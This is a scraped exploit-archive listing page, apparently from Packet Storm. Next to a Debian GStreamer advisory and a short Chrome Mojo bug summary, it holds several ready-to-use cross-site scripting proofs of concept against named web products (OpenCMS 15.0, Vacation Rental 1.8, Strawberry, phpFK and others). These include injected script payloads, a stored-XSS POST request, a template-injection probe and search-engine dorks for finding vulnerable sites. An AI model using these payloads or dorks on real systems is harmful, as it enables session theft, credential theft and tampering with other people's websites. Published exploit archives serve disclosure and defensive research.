I2P is an anonymizing network, offering a simple layer that identity-sensitive applications can use to securely communicate. All data is wrapped with several layers of encryption, and the network is both distributed and dynamic, with no trusted parties. This is the source code release version.

I2P 2.3.0

Debian Linux Security Advisory 5443-1 - Multiple multiple vulnerabilities were discovered in plugins for the GStreamer media framework and its codecs and demuxers, which may result in denial of service or potentially the execution of arbitrary code if a malformed media file is opened.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5443-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJuly 02, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : gst-plugins-base1.0CVE ID         : not yet availableMultiple multiple vulnerabilities were discovered in plugins for theGStreamer media framework and its codecs and demuxers, which may resultin denial of service or potentially the execution of arbitrary code if amalformed media file is opened.For the oldstable distribution (bullseye), this problem has been fixedin version 1.18.4-2+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 1.22.0-3+deb12u1.We recommend that you upgrade your gst-plugins-base1.0 packages.For the detailed security status of gst-plugins-base1.0 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/gst-plugins-base1.0Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmShHA4ACgkQEMKTtsN8Tja5bxAAgjo7MGD633UzSM+ipFEV87dcZqOTFRWECfR8QSZIm0Z4o6a3gK/ikwnnbUvf5b9Mvkbj7fyosaCKZa4HLbxxG9WQrnj42GBfabNouerIO+8/VylHA3pkyI+ABCXyYAlN81amT0/7w8pORz/1cP1X/x+mYtPsq+8yQBTISozs3gmJo+jCuYsfddJteITv/YvcVrunaO5XJNcXUbTaMqjvIfQkeeT/0OR1F08eCbnb8SROQ4bLySXo1hC8SmeYuI7jDcFatws6XWVjjsCG92KnX+2bMRnNP7ROR823RldgIJdoPw4R/0psenrqUzzhIKM5YwqcIkpwSVAUaQJ5238fabmk9lSygfRwqDffxcZhHTEfnGEz0RAI1QbX5bLsHd2k9zZtfRUqlPOtYRznLakIEcmEq9WlUIPON6cL58wy0g3waXMue8fbtVwsqG815WTNcnntTxj1F08Z8GuQTAkpyzaJ80nskIfbfL1Ei5C3jFGKBnqRwLuCQ8yN0m3raWHXAtj1pt/Zow3KM/DGHyb0BC8n1iznGoRyrMLpWbYP64b7Q8ONeDkKjEwv5mdpOfQGEiLCUyr3Zp7UO0GBwbwhQQoTzEWtRYwe59eIgxdIUQIff8Uh3spqcfRXPxNCDGZ8JD+mjKlOQtJlNokgqDk8lWBrv9H5Yqwc3YPtgo3xeZA==zR0U-----END PGP SIGNATURE-----

Debian Security Advisory 5443-1

Alkacon OpenCMS version 15.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting# Date: 1/07/2023# Exploit Author: tmrswrr# Vendor Homepage: http://www.opencms.org# Software Link: https://github.com/alkacon/opencms-core# Version: v15.0POC:1 ) Login in demo page , go to this urlhttps://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/.galleries/livedemo/!!2 ) Click /.galleries/ , after right click any png file  , open gallery, write in search button this payload<img src=. onerror=alert(document.domain)>3 ) You will be see alert boxPOC:1 ) Go to this url , right click any png file, rename title section and write your payload :  <img src=. onerror=alert(document.domain)>https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/230701/ld_go87op3bfy/.galleries/images/!!2 ) You will be see alert box , stored xss POC:1 ) Go to this url , right click any png file and choose replace , click change file and choose your svg fileafter save it svg file:<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>  <script type="text/javascript">    alert("XSS");  </script></svg>2 ) When click this svg file you will be see alert button

Alkacon OpenCMS 15.0 Cross Site Scripting

Inout Search Engine AI Edition version 1.1 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.inoutscripts.com/products/inout-search-engine-ai-edition/      ││  Vendor   : Inout Scripts                                                              ││  Software : Inout Search Engine AI Edition 1.1                                         ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka          CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpGET 'page' parameter is vulnerable to RXSShttps://website/index.php?page=index%2findexl7fex%3cimg%20src%3da%20onerror%3dalert(1)%3ed392j&type=Web[-] Done

Inout Search Engine AI Edition 1.1 Cross Site Scripting

During a Mojo IPC method call, there are multiple stages of validation and deserialization that take place. These assume that the contents of the message cannot be modified during the deserialization process, but the new core_ipcz implementation returns message contents directly in shared memory.

Chrome Mojo Message Validation Bypass

Vacation Rental version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/vacation-rental-website.html                         ││  Vendor   : GZ Scripts                                                                 ││  Software : Vacation Rental 1.8                                                        ││  Vuln Type: Stored XSS                                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘   Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘## Stored XSS------------------------------------------------------------POST /VacationRentalWebsite/property/8/ad-has-principes/ HTTP/1.1property_id=8&action=detail&send_review=1&cleanliness=0%3B4.2&comfort=0%3B4.2&location=0%3B4.2&service=0%3B4.2&sleep=0%3B4.2&price=0%3B4.2&username=[XSS Payload]&evaluation=3&title=[XSS Payload]&comment=[XSS Payload]&captcha=lbhkyj------------------------------------------------------------POST parameter 'username' is vulnerable to XSSPOST parameter 'title' is vulnerable to XSSPOST parameter 'comment' is vulnerable to XSS## Steps to Reproduce:1. Surf (as Guest) - Go to any Listed Property2. Go to [Customer Reviews] on this Path (http://website/property/[Number1-9]/[name-of-Property]/#customerReviews)3. Inject your [XSS Payload] in "Username"4. Inject your [XSS Payload] in "Title"5. Inject your [XSS Payload] in "Comment"6. Submit7. XSS Fired on Local Browser8. XSS will Fire & Execute on Visitor's Browser when they visit the page of Property you [Inject] the XSS Payloads in & XSS will Fire also on the [Reviews Page]Note: I think Administration Panel missing a section to Manage [Reviews] on the website      this feature must be added in next Updates [View/Edit/Delete][-] Done

Vacation Rental 1.8 Cross Site Scripting

Strawberry version 1.1.9 suffers from a cross site scripting vulnerability.

**Strawberry 1.1.9 Cross Site Scripting**

Posted Jul 2, 2023

Authored by indoushka

Strawberry version 1.1.9 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 5006ad4fe5ee6631967fbcda59c50822e4f6cf4db227a33b6f3fba8640dbb942

Download | Favorite | View

**Strawberry 1.1.9 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Strawberry 1.1.9 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : https://cutenewsru.sourceforge.io/strawberry/                                                                      |  | # Dork      : "Powered by Strawberry 1.1.9"                                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /content/index.php/"onmouseover%3d'prompt(document.cookies)'bad%3d"[+] http://127.0.0.1/dverekomondoorcom/content/index.php/"onmouseover%3d'prompt(document.cookies)'bad%3d"Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |        =======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,554)
*   Arbitrary (16,117)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,203)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,328)
*   DoS (23,288)
*   Encryption (2,363)
*   Exploit (51,405)
*   File Inclusion (4,202)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,742)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,412)
*   Magazine (586)
*   Overflow (12,627)
*   Perl (1,423)
*   PHP (5,134)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,582)
*   Root (3,573)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,861)
*   Shell (3,168)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,254)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,654)
*   Web (9,600)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,787)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,782)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,065)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,707)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

Strawberry 1.1.9 Cross Site Scripting

Sisfo Sistem Informasi Akademik LMS version 1.9.3 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : sisfo Sistem Informasi Akademik lms v1.9.3  XSS Vulnerability                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : http://unisma.ac.id/                                                                                               |  | # Dork      : inurl:mnux?=login                                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /?lgn=frm&lid=50&mnux=login&nme=Kepala%2520Akademik'"()%26%25<acx><ScRiPt >prompt(/indoushka/)</ScRiPt>[+] https://127.0.0.1/siakad.stpi-pajak.ac.id/?lgn=frm&lid=50&mnux=login&nme=Kepala%2520Akademik%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3EGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

Sisfo Sistem Informasi Akademik LMS 1.9.3 Cross Site Scripting

Rest-Cafe and Restaurant Website CMS version 2.0.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Rest-Cafe and Restaurant Website CMS 2.0.0  ْXSS Vulnerability                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 67.0.1(64-bit)                                             | | # Vendor    : https://codecanyon.net/item/rest-cafe-and-restaurant-website-cms/21630154                                          |  | # Dork      : "news.php?slug="                                                                                                   |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /news.php?slug=at-his-ludus-nonumes-gloriatur-ne-vim-tamquam%27%22()%26%25%3Cacx%3E%3CScRiPt%3Eprompt(005605414920)%3C/ScRiPt%3E[+] http://127.0.0.1/cms/news.php?slug=at-his-ludus-nonumes-gloriatur-ne-vim-tamquam%27%22()%26%25%3Cacx%3E%3CScRiPt%3Eprompt(005605414920)%3C/ScRiPt%3EGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

Rest-Cafe And Restaurant Website CMS 2.0.0 Cross Site Scripting

phpFK version 9.2 Beta suffers from cross site scripting and remote SQL injection vulnerabilities.

**phpFK 9.2 Beta Cross Site Scripting / SQL Injection**

**phpFK 9.2 Beta Cross Site Scripting / SQL Injection**

Posted Jul 2, 2023

Authored by indoushka

phpFK version 9.2 Beta suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection

SHA-256 | 09fef1efe957f866ce2e4d01724c95e85523e37eb341c2135635c17435c8b42c

Download | Favorite | View

**phpFK 9.2 Beta Cross Site Scripting / SQL Injection**

    ====================================================================================================================================| # Title     : phpFK v9.2 Beta version SQLi + XSS Vulnerability                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0.(32-bit)                                              | | # Vendor    : https://www.frank-karau.de/demo-forum/                                                                             |  | # Dork      : Powered by: phpFK                                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /forum/thread.php?board=4&thema=349'"><svg/onload=prompt(/_indoushka_/);>{{7*7}}[+] http://127.0.0.1/forum/thread.php?board=4&thema=349%27%22%3E%3Csvg/onload=prompt(/_indoushka_/);%3E{{7*7}}Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,554)
*   Arbitrary (16,117)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,203)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,328)
*   DoS (23,288)
*   Encryption (2,363)
*   Exploit (51,405)
*   File Inclusion (4,202)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,742)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,412)
*   Magazine (586)
*   Overflow (12,627)
*   Perl (1,423)
*   PHP (5,134)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,582)
*   Root (3,573)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,861)
*   Shell (3,168)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,254)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,654)
*   Web (9,600)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,787)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,782)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,065)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,707)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

Source

Packet Storm